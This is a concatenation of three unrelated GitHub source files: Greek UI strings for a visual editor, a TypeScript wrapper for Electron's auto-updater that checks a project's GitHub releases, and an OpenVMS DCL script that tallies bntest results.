"visualeditor-changedesc-image-size": "Το μέγεθος άλλαξε από $1 σε $2",
"visualeditor-changedesc-language": "Η γλώσσα άλλαξε από $1 σε $2",
"visualeditor-changedesc-link-href": "Ο στόχος συνδέσμου άλλαξε από $1 σε $2",
"visualeditor-changedesc-no-key": "$1 άλλαξε σε $2",
"visualeditor-changedesc-set": "$1 ορίστηκε σε $2",
"visualeditor-changedesc-unknown": "$1 άλλαξε",
"visualeditor-changedir": "Αλλαγή κατεύθυνσης",
"visualeditor-changedir-tool-ltr": "Εμφάνιση ως αριστερά προς δεξιά",
"visualeditor-changedir-tool-rtl": "Εμφάνιση ως δεξιά προς αριστερά",
"visualeditor-clearbutton-tooltip": "Αφαίρεση",
"visualeditor-clipboard-copy": "Αντιγραφή",
"visualeditor-clipboard-cut": "Αποκοπή",
"visualeditor-clipboard-paste": "Επικόλληση",
"visualeditor-clipboard-paste-special": "Επικόλληση ως απλό κείμενο",
"visualeditor-command-dialog-cancel": "Κλείσιμο / απόρριψη αλλαγής",
"visualeditor-command-dialog-confirm": "Επιβεβαίωση αλλαγής",
"visualeditor-commentinspector-edit": "Επεξεργασία σχολίου",
"visualeditor-commentinspector-title": "Σχόλιο",
"visualeditor-commentinspector-tooltip": "Σχόλιο",
"visualeditor-content-select-all": "Επιλογή όλων",
"visualeditor-contextitemwidget-label-close": "Κλείσιμο",
"visualeditor-contextitemwidget-label-remove": "Διαγραφή",
"visualeditor-contextitemwidget-label-secondary": "Επεξεργασία",
"visualeditor-debugbar-close": "Κλείσιμο",
"visualeditor-debugbar-logrange": "Επιλεγμένο μητρώο",
"visualeditor-debugbar-showmodel": "Εμφάνιση μοντέλου",
"visualeditor-debugbar-showtransactions": "Εμφάνιση συναλλαγών",
"visualeditor-debugbar-updatemodel": "Ενημέρωση σε αλλαγές",
"visualeditor-dialog-action-apply": "Εφαρμογή αλλαγών",
"visualeditor-dialog-action-cancel": "Ακύρωση",
"visualeditor-dialog-action-done": "Έγινε",
"visualeditor-dialog-action-goback": "Επιστροφή",
"visualeditor-dialog-action-insert": "Εισαγωγή",
"visualeditor-dialog-command-help-title": "Συντομεύσεις πληκτρολογίου",
"visualeditor-dialog-error": "Κάτι πήγε στραβά...",
"visualeditor-dialog-error-dismiss": "Πήγαινε πίσω",
"visualeditor-dialog-language-auto-direction": "Auto",
"visualeditor-dialog-language-search-title": "Επιλογή γλώσσας",
"visualeditor-dialog-table-caption": "Λεζάντα",
"visualeditor-dialog-table-title": "Ιδιότητες πίνακα",
"visualeditor-diff-no-changes": "Δεν υπάρχουν αλλαγές",
"visualeditor-find-and-replace-done": "Έγινε",
"visualeditor-find-and-replace-find-text": "Εύρεση",
"visualeditor-find-and-replace-invalid-regex": "Μη έγκυρη κανονική έκφραση",
"visualeditor-find-and-replace-match-case": "Ταίριασμα πεζών-κεφαλαίων",
"visualeditor-find-and-replace-next-button": "Εύρεση επομένου",
"visualeditor-find-and-replace-previous-button": "Εύρεση προηγουμένου",
"visualeditor-find-and-replace-regular-expression": "Regular expression",
"visualeditor-find-and-replace-replace-all-button": "Αντικατάσταση όλων",
"visualeditor-find-and-replace-replace-button": "Αντικατάσταση",
"visualeditor-find-and-replace-replace-text": "Αντικατάσταση",
"visualeditor-find-and-replace-results": "$1 από $2",
"visualeditor-find-and-replace-title": "Εύρεση και αντικατάσταση",
"visualeditor-find-and-replace-word": "Ολόκληρη τη λέξη",
"visualeditor-formatdropdown-format-blockquote": "Παράθεμα",
"visualeditor-formatdropdown-format-heading-label": "Επικεφαλίδα (1-6)",
"visualeditor-formatdropdown-format-heading1": "Επικεφαλίδα",
"visualeditor-formatdropdown-format-heading2": "Επίπεδο 2",
"visualeditor-formatdropdown-format-heading3": "Επίπεδο 3",
"visualeditor-formatdropdown-format-heading4": "Επίπεδο 4",
"visualeditor-formatdropdown-format-heading5": "Επίπεδο 5",
"visualeditor-formatdropdown-format-heading6": "Επίπεδο 6",
"visualeditor-formatdropdown-format-paragraph": "Παράγραφος",
"visualeditor-formatdropdown-format-preformatted": "Προμορφοποιημένο",
"visualeditor-formatdropdown-title": "Αλλαγή μορφοποίησης",
"visualeditor-help-tool": "Βοήθεια",
"visualeditor-historybutton-redo-tooltip": "Ακύρωση αναίρεσης",
"visualeditor-historybutton-undo-tooltip": "Αναίρεση",
"visualeditor-indentationbutton-indent-tooltip": "Αύξηση εσοχής",
"visualeditor-indentationbutton-outdent-tooltip": "Μείωση εσοχής",
"visualeditor-inspector-close-tooltip": "Κλείσιμο",
"visualeditor-inspector-remove-tooltip": "Αφαίρεση",
"visualeditor-key-alt": "Alt",
"visualeditor-key-backspace": "Backspace",
"visualeditor-key-ctrl": "Ctrl",
"visualeditor-key-delete": "Διαγραφή",
"visualeditor-key-down": "Κάτω",
"visualeditor-key-end": "Τέλος",
"visualeditor-key-enter": "Enter",
"visualeditor-key-escape": "Escape",
"visualeditor-key-home": "Αρχική",
"visualeditor-key-insert": "Εισαγωγή",
"visualeditor-key-left": "Αριστερά",
"visualeditor-key-meta": "Meta",
"visualeditor-key-page-down": "Σελίδα κάτω",
"visualeditor-key-page-up": "Σελίδα πάνω",
"visualeditor-key-right": "Δεξιά",
"visualeditor-key-shift": "Shift",
"visualeditor-key-space": "Κενό",
"visualeditor-key-tab": "Tab",
"visualeditor-key-up": "Πάνω",
"visualeditor-language-search-input-placeholder": "Αναζήτηση με το όνομα ή τον κωδικό γλώσσας",
"visualeditor-languagecontext-remove": "Αφαίρεση γλώσσας",
"visualeditor-languageinspector-title": "Γλώσσα",
"visualeditor-languageinspector-widget-changelang": "Εύρεση γλώσσας",
"visualeditor-languageinspector-widget-label-direction": "Κατεύθυνση",
"visualeditor-languageinspector-widget-label-langcode": "Κωδικός γλώσσας",
"visualeditor-languageinspector-widget-label-language": "Γλώσσα",
"visualeditor-linkcontext-label-change": "Αλλαγή ετικέτας",
"visualeditor-linkcontext-label-fallback": "Χωρίς προεπισκόπηση",
"visualeditor-linkcontext-label-label": "Ετικέτα",
"visualeditor-linkcontext-remove": "Αφαίρεση συνδέσμου",
"visualeditor-linkinspector-title": "Σύνδεσμος",
"visualeditor-listbutton-bullet-tooltip": "Λίστα με κουκκίδες",
"visualeditor-listbutton-number-tooltip": "Αριθμημένος κατάλογος",
"visualeditor-mediasizewidget-label-defaulterror": "Οι τιμές μεγέθους δεν είναι έγκυρες.",
"visualeditor-mediasizewidget-label-scale": "Κλίμακα",
"visualeditor-mediasizewidget-label-scale-percent": "% του μεγέθους μικρογραφίας",
"visualeditor-mediasizewidget-sizeoptions-custom": "Προσαρμογή",
"visualeditor-mediasizewidget-sizeoptions-default": "Προεπιλογή",
"visualeditor-mediasizewidget-sizeoptions-scale": "Κλίμακα",
"visualeditor-pagemenu-tooltip": "Επιλογές σελίδας",
"visualeditor-rebase-client-author-name": "Όνομα",
"visualeditor-rebase-client-connecting": "Σύνδεση σε εξέλιξη...",
"visualeditor-rebase-client-document-name": "Όνομα εγγράφου (προαιρετικό)",
"visualeditor-rebase-client-document-create-edit": "Δημιουργία/επεξεργασία",
"visualeditor-shortcuts-clipboard": "Πρόχειρο",
"visualeditor-shortcuts-dialog": "Έλεγχοι παραθύρων",
"visualeditor-shortcuts-formatting": "Μορφοποίηση παραγράφου",
"visualeditor-shortcuts-history": "Ιστορικό",
"visualeditor-shortcuts-insert": "Εισαγωγή",
"visualeditor-shortcuts-other": "Άλλες",
"visualeditor-shortcuts-sequence-notice": "Τύπος",
"visualeditor-shortcuts-text-style": "Styling κειμένου",
"visualeditor-slug-insert": "Εισαγωγή παραγράφου",
"visualeditor-specialcharacter-button-tooltip": "Ειδικοί χαρακτήρες",
"visualeditor-specialcharacterinspector-title": "Ειδικός χαρακτήρας",
"visualeditor-table-caption": "Λεζάντα",
"visualeditor-table-contextitem-properties": "Ιδιότητες",
"visualeditor-table-delete-col": "Διαγραφή {{PLURAL:$1|στήλης|στηλών}}",
"visualeditor-table-delete-row": "Διαγραφή {{PLURAL:$1|γραμμής|γραμμών}}",
"visualeditor-table-format-data": "Κελί περιεχομένου",
"visualeditor-table-format-header": "Κελί κεφαλίδας",
"visualeditor-table-insert-col-after": "Εισαγωγή μετά",
"visualeditor-table-insert-col-before": "Εισαγωγή πριν",
"visualeditor-table-insert-row-after": "Εισαγωγή παρακάτω",
"visualeditor-table-insert-row-before": "Εισαγωγή παραπάνω",
"visualeditor-table-insert-table": "Πίνακας",
"visualeditor-table-merge-cells": "Συγχώνευση κελιών",
"visualeditor-table-merge-cells-merge": "Συγχώνευση",
"visualeditor-table-merge-cells-unmerge": "Αναίρεση συγχώνευσης",
"visualeditor-table-move-col-after": "Μετακίνηση μετά",
"visualeditor-table-move-col-before": "Μετακίνηση πριν",
"visualeditor-table-move-row-after": "Μετακίνηση κάτω",
"visualeditor-table-move-row-before": "Μετακίνηση πάνω",
"visualeditor-table-sum": "Σύνολο: $1, Μέσος όρος: $2",
"visualeditor-tablecell-contextitem": "Κελί πίνακα",
"visualeditor-tablecell-tooltip": "Κάντε διπλό κλικ για επεξεργασία κελιού",
"visualeditor-toolbar-format-tooltip": "Μορφή παραγράφου",
"visualeditor-toolbar-history": "Ιστορικό",
"visualeditor-toolbar-insert": "Εισαγωγή",
"visualeditor-toolbar-paragraph-format": "Μορφοποίηση",
"visualeditor-toolbar-structure": "Δομή",
"visualeditor-toolbar-style-tooltip": "Στυλ κειμένου",
"visualeditor-toolbar-table": "Πίνακας",
"visualeditor-toolbar-text-style": "Styling"
}
| {
"pile_set_name": "Github"
} |
import { autoUpdater } from 'electron-updater';
import { GithubOptions } from 'builder-util-runtime';
/**
 * Wires electron-updater events to a status callback and exposes
 * check / download operations for application auto-updates.
 *
 * The GitHub feed is hard-wired to zxch3n/PomodoroLogger in checkUpdate().
 */
export class AutoUpdater {
    /**
     * @param logger status callback, invoked as (channel, payload), used to
     *               forward updater progress to the renderer window
     */
    constructor(logger: any) {
        this.init(logger);
    }

    /**
     * Registers listeners on the shared autoUpdater singleton and forwards
     * the interesting events through the supplied callback.
     *
     * @param sendStatusToWindow (channel: string, payload: unknown) => void
     */
    init(sendStatusToWindow: any) {
        autoUpdater.on('checking-for-update', () => {
            console.log('Checking for update...');
        });
        autoUpdater.on('update-available', info => {
            console.log('update available');
            sendStatusToWindow('update-available', `Version: ${info.version}; ${info.releaseName}`);
        });
        autoUpdater.on('update-not-available', info => {
            // Nothing to forward; the renderer only cares about actionable states.
            console.log('update not available');
        });
        autoUpdater.on('error', err => {
            // Forward a single human-readable message. Previously the raw Error
            // object was sent on the same channel as well, which made the
            // renderer's 'error' handler fire twice per failure.
            sendStatusToWindow('error', `Error in auto-updater. ${err}`);
        });
        autoUpdater.on('download-progress', progressObj => {
            const logMessage =
                `Download speed: ${progressObj.bytesPerSecond}` +
                ` - Downloaded ${progressObj.percent}%` +
                ` (${progressObj.transferred}/${progressObj.total})`;
            console.log(logMessage);
            sendStatusToWindow('download-progress', {
                percent: progressObj.percent,
                bytesPerSecond: progressObj.bytesPerSecond
            });
        });
        autoUpdater.on('update-downloaded', info => {
            console.log(info);
            sendStatusToWindow('update-downloaded', 'Update downloaded');
        });
    }

    /**
     * Points the updater at the GitHub releases feed and starts a check.
     * Downloading is deferred until download() is called explicitly.
     */
    checkUpdate() {
        const data = {
            provider: 'github',
            owner: 'zxch3n',
            repo: 'PomodoroLogger'
        } as GithubOptions;
        autoUpdater.setFeedURL(data);
        autoUpdater.autoDownload = false;
        // checkForUpdates() returns a promise; failures are already surfaced
        // via the 'error' event registered in init(), so swallow the rejection
        // here to avoid an unhandledRejection warning.
        autoUpdater.checkForUpdates().catch(() => {});
    }

    /**
     * Starts downloading the previously discovered update; the update is
     * installed automatically when the app quits.
     */
    download() {
        autoUpdater.autoInstallOnAppQuit = true;
        // Rejections are reported through the 'error' event; see checkUpdate().
        autoUpdater.downloadUpdate().catch(() => {});
    }
}
| {
"pile_set_name": "Github"
} |
$!
$! Analyze bntest output file.
$!
$! Exit status = 1 (success) if all tests passed,
$! 0 (warning) if any test failed.
$!
$! 2010-04-05 SMS. New. Based (loosely) on perl code in bntest-vms.sh.
$!
$! Expect data like:
$! test test_name1
$! 0
$! [...]
$! test test_name2
$! 0
$! [...]
$! [...]
$!
$! Some tests have no following "0" lines.
$!
$! P1 may name the result file to analyze; defaults to "bntest-vms.out".
$ result_file_name = f$edit( p1, "TRIM")
$ if (result_file_name .eqs. "")
$ then
$ result_file_name = "bntest-vms.out"
$ endif
$!
$! Counters: "tests" = tests seen, "passed" = tests with no bad result line,
$! "fail" = 1 while the current test is still provisionally counted as
$! passed, 0 once it has been charged with a failure (so a test with many
$! bad lines is only subtracted once).
$ fail = 0
$ passed = 0
$ tests = 0
$!
$! On Ctrl/C or any command error, jump to clean-up so the file gets closed.
$ on control_c then goto tidy
$ on error then goto tidy
$!
$ open /read result_file 'result_file_name'
$!
$! Main loop: read each line; "test <name>" starts a new test, any other
$! line that is not exactly "0" marks the current test as failed.
$ read_loop:
$ read /end = read_loop_end /error = tidy result_file line
$ t1 = f$element( 0, " ", line)
$ if (t1 .eqs. "test")
$ then
$!    New test: provisionally count it as passed and arm "fail" so the
$!    first bad result line can retract exactly one pass.
$ passed = passed+ 1
$ tests = tests+ 1
$ fail = 1
$ t2 = f$extract( 5, 1000, line)
$ write sys$output "verify ''t2'"
$ else
$ if (t1 .nes. "0")
$ then
$!    Result line other than "0": current test failed; retract its
$!    provisional pass (once only, via "fail") and report the line.
$ write sys$output "Failed! bc: ''line'"
$ passed = passed- fail
$ fail = 0
$ endif
$ endif
$ goto read_loop
$ read_loop_end:
$ write sys$output "''passed'/''tests' tests passed"
$!
$! Clean-up: close the result file only if it is actually open (its logical
$! name exists in this process table); we may arrive here before the open.
$ tidy:
$ if f$trnlnm( "result_file", "LNM$PROCESS_TABLE", , "SUPERVISOR", , "CONFINE")
$ then
$ close result_file
$ endif
$!
$! Success only if at least one test ran and none failed.
$ if ((tests .gt. 0) .and. (tests .eq. passed))
$ then
$ exit 1
$ else
$ exit 0
$ endif
$!
| {
"pile_set_name": "Github"
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.